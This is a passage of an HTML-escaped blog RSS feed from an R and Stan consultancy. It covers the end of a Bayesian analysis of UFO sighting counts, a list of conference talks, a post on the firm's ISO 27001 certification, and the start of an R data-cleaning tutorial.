&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(&lt;span style="color:#ff7b72;font-weight:bold"&gt;-&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;abs&lt;/span&gt;(mean_beta)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# A tibble: 3 × 2&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; condition mean_beta
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;int&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;&lt;/span&gt;dbl&lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4.11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2.21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;-2.04&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We see here that the 10th spline term is the most important, followed by the 3rd and 5th. Because MCMC algorithms are stochastic, your results might be slightly different to mine, but the main messages should be very similar.&lt;/p&gt;
&lt;p&gt;Again, those familiar with {tidyverse} packages will find that {tidybayes} makes plotting posterior summaries of the data relatively straightforward:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;tidy_fit &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sightings_per_year)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;stat_lineribbon&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; y_pred), .width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;.97&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;.89&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;.73&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;.5&lt;/span&gt;), colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey10&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;scale_fill_brewer&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_point&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; year_of_sighting, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sightings_per_year), data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; sights_per_year) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Year of reported sighting&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Number of recorded sightings per year&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;UFO sighting reports for Great Britain,\nwith posterior summaries superimposed&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;guides&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;guide_legend&lt;/span&gt;(title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Posterior\ncoverage&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="smoothed_count.png" alt="A scatter plot (time series) showing the number of reported UFO sightings (Great Britain) from the year 1943 to 2023. The plot has the posterior median and 50%, 73%, 89% and 97% posterior predictive bands superimposed in blue shades. The median line is approximately flat from year = 1943 to year = 1990, and the predictive bands are narrow. After 1990, the predictive bands widen considerably and the trend line rises sharply until about year = 2005, when the median line sharply plummets and the predictive bands become narrower. The median line levels out by 2022." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;From our plot, we see that indeed, the mid 2000s were the peak for UFO sightings, and the model has captured this quite well. Uncertainty quantification is also good; we see that only a small number of points lie outside the 89% and 97% predictive bands. The median line (50%) follows the trend of the data closely and is also fairly smooth!&lt;/p&gt;
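&lt;p&gt;One way to put a number on that visual check is to compute the share of observations that fall inside a given predictive band. The sketch below does this for a central 89% band. Both the &amp;ldquo;observations&amp;rdquo; and the predictive draws are simulated, and &lt;code&gt;toy_obs&lt;/code&gt;, &lt;code&gt;toy_draws&lt;/code&gt; and &lt;code&gt;coverage&lt;/code&gt; are hypothetical names; none of the values come from the UFO data or the fitted model.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)

set.seed(42)

n_years = 20
n_draws = 500

# Simulated observations, one per year index (NOT the UFO data)
toy_obs = tibble(
  condition = 1:n_years,
  y = rnbinom(n_years, mu = 50, size = 5)
)

# Simulated posterior predictive draws for each year index
toy_draws = tibble(
  condition = rep(1:n_years, each = n_draws),
  y_pred = rnbinom(n_years * n_draws, mu = 50, size = 5)
)

# Central 89% band per year, joined back to the observations,
# then the proportion of observations that land inside the band
coverage = toy_draws %&amp;gt;%
  group_by(condition) %&amp;gt;%
  summarise(
    lower = quantile(y_pred, 0.055, names = FALSE),
    upper = quantile(y_pred, 0.945, names = FALSE)
  ) %&amp;gt;%
  inner_join(toy_obs, by = "condition") %&amp;gt;%
  summarise(prop_inside = mean(y &amp;gt;= lower &amp;amp; y &amp;lt;= upper))
coverage
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;For a well-calibrated model we would expect this proportion to be roughly 0.89, although with only a handful of years the estimate will be noisy.&lt;/p&gt;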
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We&amp;rsquo;ve had a whirlwind tour of fitting flexible models for count data in Stan, and how to process the output using R and {tidybayes} to communicate our findings. UFO sightings certainly boomed during the 2000s, but in recent years, the skies appear to be somewhat empty. We only performed the analysis for the GB subset of the data. What would be interesting (but would take a while!) would be to construct a joint model for UFO sightings across all countries. We could then, for example, cluster the posterior distributions for curves to identify similar trends. This could allow us to investigate the &lt;em&gt;Independence Day&lt;/em&gt; effect; if the effect is real, we would expect to see similar patterns in countries where &lt;em&gt;Independence Day&lt;/em&gt; was popular. Of course, the same effect could be explained by other hypotheses!&lt;/p&gt;
&lt;p&gt;We didn&amp;rsquo;t show you all the code needed to run the Stan model, but you can find a complete R script and Stan file to perform the analysis in our &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-ufo-counts" rel="external"&gt;blogs repo&lt;/a&gt;. As mentioned, the MCMC algorithm is stochastic, so there may be small discrepancies between your results and mine.&lt;/p&gt;
&lt;p&gt;If you think Stan is awesome and want to learn more, then why not consider attending &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;one of our RStan or PyStan courses&lt;/a&gt;? Our courses are a great hands-on and interactive way of getting up-and-running and fitting models with Stan!&lt;/p&gt;
&lt;script src="https://www.jumpingrivers.com/third-party/stan.js"&gt;&lt;/script&gt; &lt;!-- Stan syntax --&gt;
&lt;script&gt;
document.querySelectorAll('pre code.language-stan').forEach(block =&gt; hljs.highlightBlock(block));
&lt;/script&gt;
&lt;style&gt;
pre {
color:#f8f8f2 !important;
background-color:#272822 !important;
-moz-tab-size:4 !important;
-o-tab-size:4 !important;
tab-size:4 !important;
}
&lt;/style&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/ufo-counts-in-stan-bayesian-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Talks to watch at the RSS International Conference 2023</title><link>https://www.jumpingrivers.com/blog/royal-statistical-society-conference/</link><pubDate>Tue, 29 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/royal-statistical-society-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/royal-statistical-society-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/royal-statistical-society-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://rss.org.uk/training-events/conference-2023/" rel="external"&gt;Royal Statistical Society International conference&lt;/a&gt; is next week from 4-7 September 2023, hosted in Harrogate. Jumping Rivers are exhibiting at the conference, as well as delivering workshops and talks. The draft program can now be &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program" rel="external"&gt;viewed online&lt;/a&gt;, so we wanted to let you know where you can find us at the event and some of the other sessions we are looking forward to.&lt;/p&gt;
&lt;h2 id="highlights"&gt;Highlights&lt;/h2&gt;
&lt;h3 id="teaching-statistics-interactively-with-webr"&gt;Teaching statistics interactively with webR&lt;/h3&gt;
&lt;p&gt;If you teach statistics using R and want to make your sessions more engaging, &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/session/66686" rel="external"&gt;this talk&lt;/a&gt; is one to watch. &lt;a href="https://www.linkedin.com/in/nicola-rennie/" rel="external"&gt;Nicola Rennie&lt;/a&gt; will introduce &lt;a href="https://docs.r-wasm.org/webr/latest/" rel="external"&gt;webR&lt;/a&gt; and demonstrate its potential to revolutionise the way we teach data science.&lt;/p&gt;
&lt;h3 id="github-version-control-for-research-teaching-and-industry"&gt;GitHub: Version control for research, teaching and industry&lt;/h3&gt;
&lt;p&gt;Open-source coding practices are an integral part of software and model development in all applications of data science. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/session/66711" rel="external"&gt;session&lt;/a&gt;, the panel will discuss how GitHub can be used to develop models and applications more effectively across teaching, research, and industry.&lt;/p&gt;
&lt;h3 id="how-to-avoid-becoming-an-ornamental-data-scientist"&gt;How to avoid becoming an ornamental data scientist&lt;/h3&gt;
&lt;p&gt;The RSS Data Science and AI Section have toured the country asking practitioners and companies about their hopes and fears about a career in data science and AI. In &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/session/65938" rel="external"&gt;this session&lt;/a&gt; they will outline how to become efficient, effective and ethical in your application of the statistical and algorithmic tools of the trade.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-royal-statistical-society-conference"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h2 id="jumping-rivers-talks-and-events"&gt;Jumping Rivers Talks and Events&lt;/h2&gt;
&lt;p&gt;Throughout the week, you can find &lt;a href="https://www.linkedin.com/in/statsrhian/" rel="external"&gt;Rhian Davies&lt;/a&gt; and &lt;a href="https://www.linkedin.com/in/jack-kennedy-733a09161/" rel="external"&gt;Jack Kennedy&lt;/a&gt; at the Jumping Rivers exhibition stand. Come along and say hello and pick up one of our Jumping Rivers coasters!&lt;/p&gt;
&lt;h3 id="pre-conference-workshop-for-early-career-researchers"&gt;Pre-conference workshop for early career researchers&lt;/h3&gt;
&lt;p&gt;On Monday 4th September, Jack and Rhian will both be presenting at the &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=65926&amp;s=0" rel="external"&gt;pre-conference workshop for early career researchers&lt;/a&gt;. Jack will be kicking off the afternoon, introducing the Young Statisticians section and welcoming the young statisticians to the conference, while Rhian will be delivering a skills workshop later in the afternoon on Building your data science portfolio.&lt;/p&gt;
&lt;h3 id="making-maps-visualising-spatial-data-in-r"&gt;Making Maps! Visualising spatial data in R&lt;/h3&gt;
&lt;p&gt;On Tuesday 5th September, Rhian will be delivering the workshop &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=65958&amp;s=1440" rel="external"&gt;Making Maps! Visualising spatial data in R&lt;/a&gt;, which will cover the fundamentals of working with geospatial data in R. Can&amp;rsquo;t attend? We offer a &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;training course on spatial data analysis&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="activities-to-reach-a-broader-audience-rss-ambassadors-tips-for-communicating-statistics"&gt;Activities to reach a broader audience: RSS Ambassadors&amp;rsquo; tips for communicating statistics&lt;/h3&gt;
&lt;p&gt;Communication is a big part of what we do at Jumping Rivers. In this &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=66676&amp;s=2331" rel="external"&gt;session&lt;/a&gt;, Rhian and the other RSS Statistical Ambassadors will be sharing their tips and tricks for communicating statistical concepts. This interactive session will give audience members an opportunity to practise their communication skills.&lt;/p&gt;
&lt;h3 id="getting-your-work-to-work"&gt;Getting your work to work&lt;/h3&gt;
&lt;p&gt;On Wednesday 6th September, Rhian will be taking part in the panel on &lt;a href="https://virtual.oxfordabstracts.com/#/event/4019/program?session=66692&amp;s=3000" rel="external"&gt;getting your work to work&lt;/a&gt;, talking about cleaning up messy code. She&amp;rsquo;ll share actionable tips to help you refactor your code and make it easier for collaborators to work with it.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/royal-statistical-society-conference/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Our ISO 27001 Certification</title><link>https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/</link><pubDate>Thu, 24 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Hello from the Jumping Rivers team! Today, we&amp;rsquo;re taking a moment to chat about our recent achievement – becoming ISO certified.&lt;/p&gt;
&lt;h3 id="what-is-iso-27001-and-why-does-it-matter"&gt;What is ISO 27001 and Why Does It Matter?&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://www.iso.org/standard/27001" rel="external"&gt;ISO 27001&lt;/a&gt; is an internationally recognised standard for information security management systems (ISMS). It provides a systematic approach to managing sensitive company information, ensuring its confidentiality, integrity, and availability. The standard outlines a framework that helps organisations identify and manage information security risks, implement appropriate controls, and continuously improve their security posture.&lt;/p&gt;
&lt;p&gt;In today&amp;rsquo;s digitally driven world, where data breaches and cyberattacks are rampant, ISO 27001 offers a proactive approach to safeguarding sensitive information. It not only helps companies protect their own data but also builds trust with clients, partners, and stakeholders by demonstrating a commitment to maintaining robust information security practices.&lt;/p&gt;
&lt;h3 id="why-we-chose-the-iso-path"&gt;Why We Chose the ISO Path&lt;/h3&gt;
&lt;p&gt;A couple of reasons nudged us towards these certifications:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The clients we interact with often required them.&lt;/li&gt;
&lt;li&gt;It presented a brilliant opportunity for a bit of introspection. Were our current security practices up to scratch? We were keen to find out.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-iso-27001-certification-cyber-security-management"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="our-route-to-certification"&gt;Our Route to Certification&lt;/h3&gt;
&lt;p&gt;While it was an enlightening six months, it wasn&amp;rsquo;t without its hurdles. We had to sift through our security practices and ensure they were robust. The real task, however, was fostering a company-wide understanding that security isn&amp;rsquo;t just an IT department&amp;rsquo;s concern – it&amp;rsquo;s everyone&amp;rsquo;s business.
We enlisted the help of a consultant who really knew their stuff. They guided us through the intricacies of the ISO standards, ensuring we were on the right track.&lt;/p&gt;
&lt;h3 id="the-statement-of-applicability-an-analogy"&gt;The Statement of Applicability: An Analogy&lt;/h3&gt;
&lt;p&gt;Personally, my favourite exercise in the standard is the Statement of Applicability (SoA).
Think of the SoA in the context of building a house. Imagine you&amp;rsquo;re constructing a new home and you want it to be safe and secure for your family. You wouldn&amp;rsquo;t just randomly choose security measures; you&amp;rsquo;d assess the risks, identify potential vulnerabilities, and then decide which security features to include.&lt;/p&gt;
&lt;p&gt;Similarly, the Statement of Applicability is like the blueprint for securing your organisation&amp;rsquo;s digital &amp;ldquo;house.&amp;rdquo; It&amp;rsquo;s a crucial component of ISO 27001 implementation. The SoA lists the specific controls from the ISO 27001 standard that your organisation has chosen to implement based on its unique risk profile. These controls act as the security measures that protect your sensitive information. Just as you wouldn&amp;rsquo;t install an alarm system in your home if you live in a crime-free neighbourhood, you wouldn&amp;rsquo;t implement certain controls if they aren&amp;rsquo;t relevant to your organisation&amp;rsquo;s operations and risks.&lt;/p&gt;
&lt;p&gt;The SoA ensures that your information security efforts are targeted, effective, and aligned with your business objectives. It&amp;rsquo;s a dynamic document that evolves as your organisation grows, risks change, and technology advances. Just as you might update your home security system as new threats emerge, you&amp;rsquo;ll revise your Statement of Applicability to adapt to evolving cybersecurity challenges.&lt;/p&gt;
&lt;p&gt;An example of a control we’ve excluded from our Statement of Applicability is &amp;ldquo;Cabling Security,&amp;rdquo; which pertains to safeguarding power and telecommunications cabling carrying data or supporting information services. This control emphasises protection against interception, interference, or damage to physical cabling infrastructure.&lt;/p&gt;
&lt;p&gt;Our decision to exclude this control stems from our company&amp;rsquo;s primary mode of operation, which is rooted in remote work and cloud-based infrastructure. Given that we extensively leverage major cloud providers for our server architecture, our reliance on physical on-site cabling is significantly limited. The inherent nature of cloud-based systems means that the responsibility for cabling security largely falls under the purview of these established providers.&lt;/p&gt;
&lt;p&gt;By creating a well-thought-out Statement of Applicability, you&amp;rsquo;re essentially tailoring your security &amp;ldquo;blueprint&amp;rdquo; to fit your organisation&amp;rsquo;s needs, making your ISO 27001 implementation not just a compliance exercise, but a strategic decision that aligns with your business goals and risk appetite.&lt;/p&gt;
&lt;h3 id="the-post-certification-landscape"&gt;The Post-Certification Landscape&lt;/h3&gt;
&lt;p&gt;Since waving our ISO certificates about:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We&amp;rsquo;ve noticed more of a focus on processes across the company. They have become clearer and more streamlined. It&amp;rsquo;s less winging it and more standardised, easy-to-follow instructions.&lt;/li&gt;
&lt;li&gt;The procurement process with clients? It&amp;rsquo;s been smoother sailing. That certification tends to be the seal of approval many are looking for.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="staying-the-course"&gt;Staying the Course&lt;/h3&gt;
&lt;p&gt;We&amp;rsquo;re not ones to become complacent. We have a risk treatment plan in place to implement over the coming year up to our next audit, as well as regular internal audits on the horizon, so we&amp;rsquo;re all set to keep our standards sky-high.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/iso-27001-certification-cyber-security-management/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Best Practices for Data Cleaning and Preprocessing</title><link>https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/</link><pubDate>Thu, 17 Aug 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/best-practices-data-cleaning-r/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;As data scientists, we often find ourselves immersed in a vast sea of
data, trying to extract valuable insights and hidden patterns. However,
before we embark on the journey of data analysis and modeling, we must
first navigate the crucial steps of data cleaning and preprocessing. In
this blog post, we will explore the significance of data cleaning and
preprocessing in data science workflows and provide practical tips and
techniques to handle missing data, outliers, and data inconsistencies
effectively.&lt;/p&gt;
&lt;h3 id="why-data-cleaning-and-preprocessing-matter"&gt;Why Data Cleaning and Preprocessing Matter&lt;/h3&gt;
&lt;p&gt;Data cleaning and preprocessing are fundamental steps in the data
science process. High-quality data is essential for accurate analysis
and modeling.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Improved Accuracy:&lt;/strong&gt; Incomplete data can lead to biased results and
inaccurate models.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Better Insights:&lt;/strong&gt; Preprocessed data reveals more profound insights,
patterns, and trends. Removing noise allows us to focus on the
meaningful aspects of the data.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Model Performance:&lt;/strong&gt; Machine learning models rely on clean data.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this blog, we’ll work through data processing with the R
programming language. We’ll use the
&lt;a href="https://www.tidyverse.org/" rel="external"&gt;{tidyverse}&lt;/a&gt; package, a collection of
interconnected tools, to examine and reshape our data, along with the
{janitor} package to tidy up column names. Let’s dive in and turn raw
data into something we can analyse.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Load in the Required Packages&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Install (only needed once) and load the tidyverse and janitor packages&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidyverse&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;janitor&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(tidyverse)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(janitor)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ol start="2"&gt;
&lt;li&gt;Create or load your data&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df_1 &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;-&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; id &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;5&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Alice&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Bob&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Amber&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Fred&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Eve&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Age &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;25&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;31&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;23&lt;/span&gt;, &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;),
